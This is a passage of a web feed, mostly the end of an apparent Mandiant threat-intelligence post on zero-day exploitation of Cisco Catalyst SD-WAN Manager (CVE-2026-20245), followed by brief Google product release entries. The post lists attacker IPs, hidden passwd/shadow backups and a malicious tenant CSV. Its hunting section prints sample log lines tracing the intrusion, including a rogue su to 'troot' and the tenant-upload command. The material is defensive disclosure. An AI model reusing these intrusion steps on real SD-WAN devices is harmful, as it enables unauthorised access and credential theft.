&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Implement Cisco Catalyst SD-WAN Hardening and Logging Guidelines&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Organizations should follow the comprehensive security best practices and configuration standards detailed in the &lt;/span&gt;&lt;a href="https://sec.cloudapps.cisco.com/security/center/resources/Cisco-Catalyst-SD-WAN-HardeningGuide" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cisco Catalyst SD-WAN Hardening Guide&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. This guide provides a robust defense-in-depth framework for securing all SD-WAN components including the management, control, and data planes against unauthorized access.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Indicators of Compromise (IOCs)&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a free &lt;/span&gt;&lt;a href="https://www.virustotal.com/gui/collection/d966161b93100fb8905b9b81bd03e57bbc93f21534acee88999e77798e913d5b/summary" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GTI Collection&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for registered users.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Network Indicators&lt;/span&gt;&lt;/h4&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: center;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: center;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Indicator&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IP address connecting as rogue device and exploiting CVE-2026-20245&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;126.51.108[.]152&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IP address connecting as rogue device&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;76.92.245[.]217&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IP address connecting as rogue device&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;207.190.37[.]94&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IP address connecting as rogue device&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;23.245.7[.]178&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IP address connecting as rogue device&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;153.186.231[.]233&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IP address connecting as rogue device&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;167.179.79[.]189&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IP address connecting as rogue device&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;45.32.38[.]160&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IP address connecting as rogue device&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;209.137.225[.]101&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;File Indicators&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Due to the threat actor's extensive anti-forensic cleanup, several files associated with this intrusion were overwritten or deleted. However, forensic remnants of the malicious CSV payload were recovered.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: center;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: center;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: center;"&gt;&lt;strong style="vertical-align: baseline;"&gt;SHA256&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;/home/admin/.orig_vbond_vsmart_tenant_list&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Backup configuration file&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Not recovered&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;/home/admin/.orig_vbond_vsmart_tenant_list.state&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;State file&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Not recovered&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;/home/admin/.orig_passwd&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Backup password file&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Not recovered&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;/home/admin/.orig_shadow&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Backup password file&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Not recovered&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;/home/admin/evil_tenant.csv&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Remnant of malicious CSV file exploiting CVE-2026-20245&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;b82936f37648518425c7d3cf9e09eaffa41d7cdb3840f6a40287e3a108880f7b&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Detections and Hunting&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Mandiant encourages organizations to conduct proactive threat hunts focused on the tactics, techniques, and procedures (TTPs) outlined in this report to identify activity that may otherwise blend into routine operations. Because certain indicators of compromises may mirror legitimate administrative actions, it is critical to assess these observations against the established network posture to minimize false positives.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As per Cisco’s guidance, any suspicious activity or confirmed IOCs should be forwarded to the Cisco TAC for comprehensive review and assistance.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Unauthorized SSH Connections as &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;vmanage-admin&lt;/code&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Monitor authentication logs (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/var/log/auth.log&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) for logins originating from unexpected external IP addresses using the vmanage-admin user account.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;Jan 01 07:58:00 vManage sshd[20766]: Accepted publickey for vmanage-admin from &amp;lt;Threat Actor IP&amp;gt; port 48373 ssh2: RSA SHA256:&amp;lt;redacted&amp;gt;
Jan 01 08:01:00 vManage sshd[25178]: Accepted keyboard-interactive/pam for admin from &amp;lt;Threat Actor IP&amp;gt; port 60552 ssh2&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 5: SSH from unexpected origins&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4 style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;Suspicious Password Change Events&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Audit password changes in &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/var/log/auth.log&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; targeting the admin account in quick succession, particularly where credentials are set and subsequently reverted.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;Jan 01 08:00:00 vManage usermod[12345]: change user 'admin' password
Jan 01 08:15:00 vManage usermod[12345]: change user 'admin' password&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 6: Password changes&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Defenders should also inspect rollback files present within &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/var/confd/rollback/&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; for configuration delta commits targeting user passwords:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;# Created by: vmanage-admin
# Date: 2026-01-01 08:00:00
# Via: netconf
# Type: delta
# Label: 
# Comment: 
# No: 10000
# TransactionId: 12345678
# Hostname: vManage

system {
    aaa {
        user admin {
password &amp;lt;redacted&amp;gt;;
        }
     }
 }&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 7: Rollback files&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4 style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;Suspicious Execution of the &lt;code&gt;su&lt;/code&gt; Command&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Audit terminal command history and system logs (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/var/log/auth.log&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) for successful switch user (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;su&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) executions from the admin account to unauthorized accounts (e.g., &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;troot&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;).&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;Jan 01 08:03:00 vManage su[24289]: Successful su for troot by admin&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 8: &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;su&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; logins&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4 style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;Exploitation of CVE-2026-20245&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Monitor script logs (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/var/log/scripts.log&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) for execution anomalies involving unauthorized execution of &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;vconfd_script_upload_tenant_list.sh&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;Jan 01 08:01:05 vManage vScript: Tenant list upload per vsmart serial number: /usr/bin/vconfd_script_upload_tenant_list.sh -cli path /home/admin/evil_tenant.csv vpn 0
Jan 01 08:01:05 vManage vScript: uploading tenant list via VPN 0 true
Jan 01 08:01:05 vManage vScript: Copying ... /home/admin/evil_tenant.csv via VPN 0
Jan 01 08:01:05 vManage vScript: Successfully loaded the tenant placement file&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 9: Execution anomalies&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Defenders can also query active command execution history using show history within the Viptela CLI for the specific administrative upload commands:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;01-01 08:01:05 -- request tenant-upload tenant-list /home/admin/evil_tenant.csv vpn 0&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 10: Command execution&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Google Security Operations (SecOps)&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google SecOps customers have access to these broad category rules and more under the Mandiant Intel Emerging Threats rule pack. The activity discussed in the blog post is detected in Google SecOps under the rule names:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Privileged Account Append to Passwd Database&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Grep Privileged User Account Discovery in Passwd or Shadow&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Hidden Backup of Sensitive System Files&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Suspicious Copy from Usr Share to User Hidden Directory&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Acknowledgements&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Mandiant would like to thank the Cisco Product Security Incident Response Team (PSIRT) for their collaboration and partnership throughout the coordinated disclosure process.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/threat-intelligence/zero-day-exploitation-cisco-catalyst-sd-wan-manager/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-24T11:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#June_24_2026</id>
    <title>Cloud Release Notes — June 24, 2026</title>
    <updated>2026-06-24T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Gemini Enterprise Agent Platform&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;AI security findings in Agent Platform&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Viewing AI security findings and posture management summaries in Gemini
Enterprise Agent Platform is &lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;generally
available&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;With this release, the &lt;strong&gt;Security&lt;/strong&gt; dashboard introduces the &lt;strong&gt;Top security
findings&lt;/strong&gt; widget.&lt;/p&gt;
&lt;p&gt;Also, specific features within the AI security widgets are
available in &lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Preview&lt;/a&gt;,
including the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Vulnerability findings and threat monitoring for agent runtimes (such as
Cloud Run)&lt;/li&gt;
&lt;li&gt;Historical content violation trends (&lt;strong&gt;Violations over time&lt;/strong&gt;)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/govern/view-security-findings"&gt;View security
findings&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#June_24_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-06-24T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://ai.google.dev/gemini-api/docs/changelog#06-24-2026</id>
    <title>Gemini API — 2026-06-24</title>
    <updated>2026-06-24T00:00:00+00:00</updated>
    <content type="text">Korzystanie z komputera: udostępniliśmy publiczną wersję testową narzędzia Korzystanie z komputera w Gemini 3.5 Flash. Ta wersja zawiera uproszczone działania z intencjami, wbudowaną obsługę środowisk przeglądarki, urządzeń mobilnych i komputerów, konfigurowalne zasady bezpieczeństwa oraz zaawansowane wykrywanie wstrzykiwania promptów.</content>
    <link href="https://ai.google.dev/gemini-api/docs/changelog#06-24-2026" rel="alternate"/>
    <category term="Gemini API"/>
    <published>2026-06-24T00:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://firebase.blog/posts/2026/06/firestore-serialization-react</id>
    <title>Zero-flicker Firestore SSR with React</title>
    <updated>2026-06-24T00:00:00+00:00</updated>
    <link href="https://firebase.blog/posts/2026/06/firestore-serialization-react" rel="alternate"/>
    <category term="Firebase"/>
    <published>2026-06-24T00:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/technology/research/helping-communities-prepare-for-natural-disasters</id>
    <title>Towards a world where no one is surprised by a natural disaster</title>
    <updated>2026-06-23T19:40:00+00:00</updated>
    <content type="html">Photo of a waterside city with flood alerts on top</content>
    <link href="https://blog.google/innovation-and-ai/technology/research/helping-communities-prepare-for-natural-disasters" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-23T19:40:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/technology/research/helping-communities-prepare-for-natural-disasters/</id>
    <title>Towards a world where no one is surprised by a natural disaster</title>
    <updated>2026-06-23T19:40:00+00:00</updated>
    <content type="html">Photo of a waterside city with flood alerts on top</content>
    <link href="https://blog.google/innovation-and-ai/technology/research/helping-communities-prepare-for-natural-disasters/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-23T19:40:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/room-codes-google-meet-hardware-early-preview.html</id>
    <title>Connect to Google Meet hardware with room codes now in Early Preview</title>
    <updated>2026-06-23T18:57:59+00:00</updated>
